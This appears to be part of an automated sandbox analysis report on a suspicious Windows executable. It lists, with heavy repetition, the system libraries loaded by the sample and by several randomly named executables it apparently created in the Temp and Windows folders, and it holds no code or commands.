Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: schedcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: spp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: schedcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: dlnashext.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: wpdshext.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\ojtoccrezqmarmjwql.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bzmkbewmkeduommczxkiz.exeSection loaded: onecorecommonproxystub.dll
